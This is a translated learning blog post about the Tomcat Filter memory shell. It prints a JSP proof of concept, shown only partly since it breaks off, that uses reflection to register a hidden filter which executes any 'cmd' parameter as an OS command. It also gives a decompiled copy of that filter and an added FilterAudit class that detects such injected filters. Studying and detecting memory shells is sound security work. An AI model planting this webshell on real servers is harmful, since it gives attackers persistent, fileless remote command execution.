I learned Flask memory shells (内存马) earlier and have always wanted to learn the Java ones too, so I studied the Tomcat Filter memory shell. I still feel like a complete beginner; it is hard and I do not fully understand it. Lately I have not really wanted to publish the notes I write while learning Java, because I have not properly understood the material myself and it is all a bit hazy: I read the various articles that explain how things work, follow their analysis, and they hand out a POC and a conclusion, but apart from being able to run the POC I did not understand much. I can only say I am still too green.
I mainly followed 天下大木头's article while learning this.
Note that the command-execution part of the POC uses the Windows form; on Linux use the commented-out line instead.
The POC is a JSP. It unwraps the `ServletContext` down to Tomcat's `StandardContext`, reaches the private `filterConfigs` map, and, if no filter with the chosen name is registered yet, builds an anonymous `Filter` in memory and registers it on the context without touching `web.xml`:

```jsp
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%
    // ServletContext -> ApplicationContextFacade -> ApplicationContext -> StandardContext,
    // each hop through a private field named "context"
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
    Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
    applicationContextFacadeContext.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
    Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
    applicationContextContext.setAccessible(true);
    StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);

    // filterConfigs: the private map of instantiated filters, filter name -> ApplicationFilterConfig
    Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
    filterConfigs.setAccessible(true);
    HashMap hashMap = (HashMap) filterConfigs.get(standardContext);

    String filterName = "ego";
    if (hashMap.get(filterName) == null) {   // register only once, so the JSP can be hit repeatedly
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
                //Filter.super.init(filterConfig);
                //System.out.println("memory shell init");
            }

            @Override
            public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
                if (request.getParameter("cmd") != null) {
                    //String[] cmds = {"/bin/sh", "-c", request.getParameter("cmd")};   // Linux
                    String[] cmds = {"cmd", "/c", request.getParameter("cmd")};         // Windows
                    InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                    byte[] bcache = new byte[1024];
                    int readSize = 0;
                    try (ByteArrayOutputStream outputStream = new ByteArrayOutputStream()) {
                        while ((readSize = in.read(bcache)) != -1) {
                            outputStream.write(bcache, 0, readSize);
                        }
                        response.getWriter().println(outputStream.toString());
                    }
                }
            }

            @Override
            public void destroy() {
                Filter.super.destroy();
            }
        };

        // the FilterDef carries the instance and its name; addFilterDef puts it on the context
        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(filterName);
        filterDef.setFilterClass(filter.getClass().getName());
        standardContext.addFilterDef(filterDef);

        // the FilterMap ties the name to a URL pattern
        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("
```

The page's copy of the POC breaks off here, in the middle of the `addURLPattern` call, and the closing `%>` never appears; the imports of `Constructor` and `ApplicationFilterConfig` show that the missing tail goes on to build the `ApplicationFilterConfig` reflectively and place it in `filterConfigs`, but that part is not reproduced on the page. Two things worth noticing in what is there: `doFilter` never calls `chain.doFilter(request, response)`, so every request that matches the filter's URL pattern ends at this filter instead of reaching the application (the decompiled class below confirms this is what was actually deployed), and the `hashMap.get(filterName) == null` guard is what keeps a second visit to the JSP from registering a second `ego` filter.

This is the anonymous filter class as it exists once Jasper has compiled the JSP, decompiled with Arthas (`shell_jsp.1` is the decompiler's rendering of the inner class `shell_jsp$1`; the `throwable`/`var9_10` bookkeeping is the decompiled form of the try-with-resources block):

```java
package org.apache.jsp;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;

class shell_jsp.1 implements Filter {
    shell_jsp.1() {
    }

    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void destroy() {
        super.destroy();
    }

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        if (request.getParameter("cmd") != null) {
            String[] cmds = new String[]{"cmd", "/c", request.getParameter("cmd")};
            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
            byte[] bcache = new byte[1024];
            int readSize = 0;
            Throwable throwable = null;
            Object var9_10 = null;
            try (ByteArrayOutputStream outputStream = new ByteArrayOutputStream();) {
                while ((readSize = in.read(bcache)) != -1) {
                    outputStream.write(bcache, 0, readSize);
                }
                response.getWriter().println(outputStream.toString());
            }
            catch (Throwable throwable2) {
                if (throwable == null) {
                    throwable = throwable2;
                } else if (throwable != throwable2) {
                    throwable.addSuppressed(throwable2);
                }
                throw throwable;
            }
        }
    }
}
```
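As an added example (my code, not from the original post or from 天下大木头's article): the same reflection chain the POC walks, turned around to audit what is actually registered in `StandardContext`. It lists every entry in `filterConfigs` together with the URL patterns mapped to it and flags filters that look like they were compiled from a JSP at runtime, which is exactly the signature the Arthas dump above shows (class in the `org.apache.jsp` package, anonymous class, loaded by Tomcat's `JasperLoader`). It assumes Tomcat 8.5/9 with `javax.servlet`; the class and method names `FilterAudit`, `audit` and `suspiciousTraits` are my own.

```java
// Added example, not part of the original post: audit the filters Tomcat really holds.
// Assumes Tomcat 8.5/9 (javax.servlet) and a ServletContext of the web app under inspection.
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

import javax.servlet.Filter;
import javax.servlet.ServletContext;

import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterMap;

public class FilterAudit {

    /** Same chain the POC uses: facade -> ApplicationContext -> StandardContext. */
    static StandardContext unwrap(ServletContext servletContext) throws Exception {
        ApplicationContextFacade facade = (ApplicationContextFacade) servletContext;
        Field f = ApplicationContextFacade.class.getDeclaredField("context");
        f.setAccessible(true);
        ApplicationContext appCtx = (ApplicationContext) f.get(facade);
        Field c = ApplicationContext.class.getDeclaredField("context");
        c.setAccessible(true);
        return (StandardContext) c.get(appCtx);
    }

    /** The private filterConfigs map: every filter instance the context will dispatch to. */
    @SuppressWarnings("unchecked")
    static Map<String, ApplicationFilterConfig> filterConfigs(StandardContext ctx) throws Exception {
        Field f = StandardContext.class.getDeclaredField("filterConfigs");
        f.setAccessible(true);
        return (Map<String, ApplicationFilterConfig>) f.get(ctx);
    }

    /** ApplicationFilterConfig.filter is private and its getter is package-private, so read the field. */
    static Filter filterInstance(ApplicationFilterConfig cfg) throws Exception {
        Field f = ApplicationFilterConfig.class.getDeclaredField("filter");
        f.setAccessible(true);
        return (Filter) f.get(cfg);
    }

    /** Traits that match a JSP-injected filter such as org.apache.jsp.shell_jsp$1 (heuristic names are mine). */
    static List<String> suspiciousTraits(Filter filter) {
        List<String> traits = new ArrayList<>();
        Class<?> k = filter.getClass();
        if (k.isAnonymousClass()) traits.add("anonymous class");
        if (k.getName().startsWith("org.apache.jsp.")) traits.add("compiled from a JSP");
        ClassLoader cl = k.getClassLoader();
        if (cl != null && cl.getClass().getName().contains("Jasper")) traits.add("loaded by JasperLoader");
        return traits;
    }

    /** One report line per registered filter, marked SUSPICIOUS when any heuristic fires. */
    public static List<String> audit(ServletContext servletContext) throws Exception {
        StandardContext ctx = unwrap(servletContext);
        List<String> report = new ArrayList<>();
        for (Map.Entry<String, ApplicationFilterConfig> e : filterConfigs(ctx).entrySet()) {
            Filter filter = filterInstance(e.getValue());
            if (filter == null) continue;  // declared but not yet instantiated
            StringBuilder sb = new StringBuilder();
            sb.append(e.getKey()).append(" -> ").append(filter.getClass().getName());
            // the FilterMap side of the registration: which URL patterns route into this filter
            for (FilterMap fm : ctx.findFilterMaps()) {
                if (e.getKey().equals(fm.getFilterName())) {
                    sb.append(" patterns=").append(String.join(",", fm.getURLPatterns()));
                }
            }
            List<String> traits = suspiciousTraits(filter);
            if (!traits.isEmpty()) sb.append(" SUSPICIOUS: ").append(String.join("; ", traits));
            report.add(sb.toString());
        }
        return report;
    }
}
```

Call `FilterAudit.audit(request.getServletContext())` from a JSP or servlet you control and compare the report against the filters declared in `web.xml` and via `@WebFilter`: a line such as `ego -> org.apache.jsp.shell_jsp$1 ... SUSPICIOUS` with no matching declaration is the filter this POC plants. The traits are indicators, not proof; a shell dropped as a real class file under `WEB-INF/classes` and registered the same way would not trip them, so the declaration comparison is the part that matters.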
Summary
Too hard. I have not touched Java in a long time and I do not know Servlet or Tomcat either, so reading this is like reading scripture. I give up for now; next I will start Java again from the basics.
References
https://www.yuque.com/tianxiadamutou/zcfd4v/kd35na#de7894b8
https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w
https://www.cnblogs.com/whgk/p/6399262.html
https://xz.aliyun.com/t/10196#toc-3
https://github.com/Firebasky/Java/blob/main/java%E5%86%85%E5%AD%98%E9%A9%AC/Tomcat%20Filter/Tomcat%20Filter.rar
https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247497074&idx=1&sn=70af33768141a7f47ba897d0088c1d6f&chksm=9acd25edadbaacfb66508a9c7d3a4fc4c8ab3e4b10750649ca660918c9fb6a6c38bb82234c0d&mpshare=1&scene=23&srcid=07115avttH7no39MEFCHDTYD&sharer_sharetime=1625974302865&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd
Feel free to share; when reposting please credit the source: 内存溢出